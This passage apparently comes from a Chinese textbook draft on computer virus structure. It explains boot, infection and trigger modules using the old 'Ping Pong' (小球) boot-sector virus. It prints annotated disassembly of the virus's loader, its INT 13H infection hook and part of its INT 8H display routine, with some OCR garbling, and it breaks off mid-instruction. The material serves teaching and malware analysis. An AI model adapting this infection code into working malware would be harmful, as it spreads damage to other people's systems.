【文章內容簡介】 0200 SUB AX，0001；內存總量減去2 kB，以防0000∶7C2D A31304 MOV [ 0413]，AX；用戶程序覆蓋0000∶7C30 B106 MOV CL，06；計算最高段地址0000∶7C32 D3E0 SHL AX，CL0000∶7C34 2DC007 SUB AX，07C0；如內存為640K，AX= 07C0把病毒程序的第一部分從0000∶7C00H～0000∶7DFFH 搬到內存高端留出的2 kB 空間中，位置為97C0∶7C00H～97C0∶7DFFH。0000∶7C37 8EC0 MOV ES，AX0000∶7C39 BE007C MOV SI，7C000000∶7C3C 8BFE MOV DI，SI0000∶7C3E B90001 MOV CX，01000000∶7C41 F3 REPZ；將[ 0000∶7C00H] →[ ES∶7C00]0000∶7C42 A5 MOVSW；傳送256 個字0000∶7C43 8EC8 MOV CS，AX；CS= 病毒程序段地址97C0∶7C45 0E PUSH CS97C0∶7C46 1F POP DS97C0∶7C47 E80000 CALL 7C4A97C0∶7C4A 32E4 XOR AH，AH97C0∶7C4C CD13 I NT 13；復位磁盤97C0∶7C4E 8026F87D80 AND BYTE PTR[ 7DF8]，8097C0∶7C53 8B1EF97D MOV BX，[ 7DF9]；[ 7DF9] = 病毒第二部分的開始97C0∶7C57 0E PUSH CS；邏輯扇區(qū)號97C0∶7C58 58 POP AX97C0∶7C59 2D2000 SUB AX，020097C0∶7C5C 8EC0 MOV ES，AX97C0∶7C5E E83C00 CALL 7C9D；讀病毒第二部分程序97C0∶7C61 8B1EF97D MOV BX，[ 7DF9]97C0∶7C65 43 I NC BX；BX= 原引導記錄所在邏輯扇區(qū)號97C0∶7C66 B8C0FF MOV AX，F(xiàn)FC0；FFC0 + 8000 =7C00( 不計溢出)97C0∶7C69 8EC0 MOV ES，AX97C0∶7C6B E82F00 CALL 7C9D；讀原引導記錄到0000∶7C00H 中97C0∶7C6E 33C0 XOR AX，AX97C0∶7C70 A2F77D MOV [ 7DF7]，AL97C0∶7C73 8ED8 MOV DS，AX97C0∶7C75 A14C00 MOV AX，[ 004C]97C0∶7C78 8B1E4E00 MOV BX，[ 004E]；取I NT 13H 中斷向量→BX，AX97C0∶7C7C C7064C00D0 MOV WORD PTR[ 4C]，7CD097C0∶7C82 8C0E4E00 MOV [ 004E]，CS；改INT 13H 中斷向量為：CS∶7CD097C0∶7C86 0E PUSH CS；保留原INT 13H 中斷向量97C0∶7C87 1F POP DS97C0∶7C88 A32A7D MOV [ 7D2A]，AX；原向量移→[ DS∶7D2A]97C0∶7C8B 891E2C7D MOV [ 7D2C]，BX；段地址→[ DS∶7D2C]97C0∶7C8F 8A16F87D MOV DL，[ 7DF8]97C0∶7C93 EA007C0000 JMP 0000∶7C00；把控制權交給原DOS 引導程序97C0∶7C98 B80103 MOV AX，0301；寫盤模塊97C0∶7C9B EB03 JMP 7CA0；97C0∶7C9D B80102 MOV AX，0201；讀盤模塊97C0∶7CA0 93 XCHG BX，AX97C0∶7CA1 03061C7C ADD AX ，[ 7C1C] ；[ 7C1C] = 隱藏扇區(qū)數(shù)97C0∶7CA5 33D2 XOR DX，DX97C0∶7CA7 F736187C DI V WORD PTR [ 7C18] ；[ 7C18] = 每道扇區(qū)數(shù)97C0∶7CAB FEC2 I NC DL97C0∶7CAD 8AEA MOV CH，DL97C0∶7CAF 33D2 XOR DX，DX97C0∶7CB1 F7361A7C DI V WORD PTR[ 7C1A] ；[ 7C1A] = 磁頭數(shù)97C0∶7CB5 B106 MOV CL ，0697C0∶7CB7 D2E4 SHL AH，CL97C0∶7CB9 0AE5 OR AH，CH97C0∶7CBB 8BC8 MOV CX ,AX97C0∶7CBD 86E9 XCHG CL，CH97C0∶7CBF 8AF2 MOV DH，DL97C0∶7CC1 8BC3 MOV AX，BX97C0∶7CC3 8A16F87D MOV DL，[ 7DF8]；讀寫磁盤的子程序97C0∶7CC7 BB0080 MOV BX，800097C0∶7CCA CD13 I NT 1397C0∶7CCC 7301 JNB 7CCF97C0∶7CCE 58 POP AX97C0∶7CCF C3 RET. . . . . . . . . 病毒的感染部分 病毒的感染模塊及感染機制感染模塊主要完成病毒的動態(tài)感染，是各種病毒必不可少的模塊。各種病毒感染模塊大同小異，區(qū)別主要在于感染條件。病毒在取得對系統(tǒng)的控制權后，先執(zhí)行它的感染操作中的條件判斷模塊，判斷感染條件是否滿足(如每次打開新的文件、程序或對磁盤進行操作時，病毒就會檢查是否為特定的文件、程序，或尋找文件、程序或磁盤等介質中是否有感染標記，是否為特定系統(tǒng)的時間、日期等) ；如果滿足感染條件，進行感染，將病毒代碼入宿主程序；然后再執(zhí)行其他的操作( 如執(zhí)行病毒的表現(xiàn)( 破壞) 模塊) ，最后再執(zhí)行系統(tǒng)正確的處理，這是病毒感染經(jīng)常采取的手段之一。 感染部分程序的舉例例：“小球”病毒的感染部分的片段在系統(tǒng)啟動過程中，病毒程序的引導模塊完成了整個病毒程序的加載，并使得病毒程序的感染模塊處于激活狀態(tài)，在系統(tǒng)運行過程中，一旦發(fā)生了I NT 13H 中斷，病毒程序的感染模塊即被執(zhí)行，其執(zhí)行流程如圖3 .2 所示。 小球病毒感染模塊執(zhí)行流程 這個圖重畫下面是“小球”病毒感染模塊和表現(xiàn)模塊的判斷程序部分，由INT 13H 指向。代碼少寫，或者不寫，只要說明原理就行了，如果你完全明白他的意思也可以寫。代碼的字體比正文小一號。97C0∶7CD0 1E PUSH DS ；7CD0 ～7CD9H 為修改后的97C0∶7CD1 06 PUSH ES ；I NT 13H 中斷服務程序97C0∶7CD2 50 PUSH AX97C0∶7CD3 53 PUSH BX97C0∶7CD4 51 PUSH CX97C0∶7CD5 52 PUSH DX97C0∶7CD6 0E PUSH CS97C0∶7CD7 1F POP DS97C0∶7CD8 0E PUSH CS97C0∶7CD9 07 POP ES97C0∶7CDA F606F77D01 TEST BYTE PTR [7DF7] ，01；是否感染狀態(tài)97C0∶7CDF 7542 JNZ 7D2397C0∶7CE1 80FC02 CMP AH，02；是否讀盤操作97C0∶7CE4 753D JMZ 7D2397C0∶7CE6 3816F87D CMP [ 7DF8] ，DL ；驅動器號是否一致97C0∶7CEA 8816F87D MOV [ 7DF8] ，DL97C0∶7CEE 7522 JNZ 7D12 ；不是則轉7D12H97C0∶7CF0 32E4 XOR AH，AH97C0∶7CF2 CD1A I NT 1A ；讀時鐘計數(shù)值97C0∶7CF4 F6C67F TEST DH，7F97C0∶7CF7 750A JNZ 7D0397C0∶7CF9 F6C2F0 TEST DL ，F(xiàn)0 ；7CE1 ～7CFEH 為表現(xiàn)模塊的判斷97C0∶7CFC 7 505 JNZ 7D03 ；部分是否連續(xù)兩次讀同一盤且滿足97C0∶7CFE 52 PUSH DX ；整點或半點的時間條件97C0∶7CFF E8B101 CALL 7EB3 ；滿足條件，執(zhí)行表現(xiàn)模塊97C0∶7D02 5A POP DX97C0∶7D03 8BCA MOV CX，DX97C0∶7D05 2B16B07E SUB DX，[ 7EB0]97C0∶7D09 890EB07E MOV [ 7EB0] ，CX97C0∶7D0D 83EA24 SUB DX,，+ 2497C0∶7D10 7211 JB 7D2397C0∶7D12 800EF77D01 OR BYTE PTR [ 7DF7] ，01 ；感染狀態(tài)標志97C0∶7D17 56 PUSH SI97C0∶7D18 57 PUSH DI97C0∶7D19 E81200 CALL 7D2E ；執(zhí)行感染模塊97C0∶7D1C 5F POP DI97C0∶7D1D 5E POP SI97C0∶7D1E 8026F77DFE AND BYTE PTR [ 7DF7] ，F(xiàn)E ；清感染狀態(tài)97C0∶7D23 5A POP DX97C0∶7D24 59 POP CX97C0∶7D25 5B POP BX97C0∶7D26 58 POP AX97C0∶7D27 07 POP ES97C0∶7D28 1F POP DS97C0∶7D29 EA1A0500C8 JMP C800∶051A ；執(zhí)行原INT 13H大致過程是：讀入目標磁盤的第一扇區(qū)，并判斷是何種類型磁盤、是否已被小球病毒感染( 病毒標志為1357H)，符合條件時進行感染。首先在FAT 表中找出一個未用簇，并將它標為壞簇，然后將病毒程序的第二部分寫入該簇第一扇區(qū)，把原磁盤的引導記錄寫入第二扇區(qū)，并把病毒程序的第一部分寫入被感染目標盤的引導扇區(qū)，這就完成了“小球”病毒對一個新磁盤的感染。 病毒的表現(xiàn)（破壞）部分 病毒的表現(xiàn)（破壞）模塊及表現(xiàn)（破壞）機制表現(xiàn)( 破壞) 模塊主要完成病毒的表現(xiàn)或破壞功能，也可稱為病毒的載體模塊，是計算機病毒的主體模塊。它負責實施病毒的表現(xiàn)( 破壞) 動作，其內部是實現(xiàn)病毒編寫者預定計算機病毒的結構及作用機制破壞動作的代碼，這些破壞動作可能是破壞文件、數(shù)據(jù)，或計算機的空間效率和時間效率,使系統(tǒng)的運行變慢，干擾視頻顯示，甚至使機器運行崩潰，這是病毒為了表明自己的存在和達到自己的目的，或早或晚是一定要發(fā)作的。它的發(fā)作部分應具備兩個特征：第一，程序要有一定的隱蔽性及潛伏性，因為病毒的這部分程序是非正常的處理程序，不愿意被人們發(fā)現(xiàn)它的存在；第二，病毒發(fā)作的條件性和多樣性。無論哪一種計算機病毒，都很少在未進行條件判斷之前隨意發(fā)作，通常只有在符合某種條件以后才發(fā)作。病毒的觸發(fā)條件大概有以下5 種：? 時間、日期作觸發(fā)條件；② 計數(shù)器作觸發(fā)條件；③ 鍵盤字符輸入作觸發(fā)條件；④ 特定文件出現(xiàn)作觸發(fā)條件；⑤ 綜合觸發(fā)條件，它決定于病毒設計者的意圖。計算機病毒的破壞和表現(xiàn)模塊一般分為兩個部分：一個是破壞模塊的觸發(fā)條件的判斷部分；一個是破壞功能的實施部分。觸發(fā)條件的判斷部分時刻監(jiān)視著計算機系統(tǒng)的運行環(huán)境，尋找破壞和表現(xiàn)的時刻；而破壞功能的實施部分經(jīng)常靜止不動，有的病毒甚至要潛伏一年半載，甚至三五年，視觸發(fā)條件的設計而定，一旦條件滿足，實施破壞部分被觸發(fā)，才突然發(fā)作。許多潛伏期長的惡性病毒發(fā)作的破壞作用是難以預計的。和病毒的感染模塊一樣，破壞模塊可能在病毒程序第一次加載時就運行，也可能在第一次加載時只將引導模塊引入內存，以后再通過某些中斷機制觸發(fā)才運行。破壞機制在設計原則上也與感染機制基本相同，也是通過修改某一中斷向量入口地址，使該中斷向量指向病毒程序的破壞模塊。因為病毒表現(xiàn)( 破壞) 模塊的觸發(fā)大都與系統(tǒng)時間有關，所以病毒常用到的系統(tǒng)中斷，除了病毒傳播利用的INT 13H、INT 21H 外，還有與系統(tǒng)時間或時鐘有關的中斷向量，如INT 1CH( 軟時鐘中斷) 、I NT 8H( 硬時鐘中斷) 和I NT 1AH( 讀取設定系統(tǒng)時間，日期) 等。當系統(tǒng)或被加載的程序訪問該被修改過的中斷向量時，病毒的破壞模塊就被激活，在判斷設定條件滿足的情況下，就開始各種破壞。 表現(xiàn)部分程序舉例例：“小球”病毒表現(xiàn)部分的程序片段“小球”病毒的表現(xiàn)模塊包含在感染模塊之中，其觸發(fā)條件為判斷是否半點或整點而且連續(xù)對同一磁盤讀取。執(zhí)行表現(xiàn)模塊的前提也是“AH= 2”，這一模塊執(zhí)行時，再進行進一步的條件判別，然后才決定是否實施干擾，其執(zhí)行流程如圖3 .5 所示。圖 “小球”病毒表現(xiàn)模塊執(zhí)行流程圖重畫下面是“小球”病毒程序的表現(xiàn)模塊程序，由I NT 8H 所指向( 7EBF ～7EDAH 保留I NT 8H 的原中斷向量，并將I NT 8H 修改成指向97C0∶7EDFH 病毒程序的顯示部分) 。97C0∶7EDF 1E PUSH DS97C0∶7EE0 50 PUSH AX97C0∶7EE1 53 PUSH BX97C0∶7EE2 51 PUSH CX97C0∶7EE3 52 PUSH DX97C0∶7EE4 0E PUSH CS97C0∶7EE5 1F POP DS97C0∶7EE6 B40F MOV AH，0F；讀當前顯示方式97C0∶7EE8 CD10 I NT 1097C0∶7EEA 8AD8 MOV BL，AL；當前方式與上次相同?97C0∶7EEC 3B1ED47F CMP BX，[ 7FD4]97C0∶7EF0 7435 JZ 7F2797C0∶7EF2 891ED47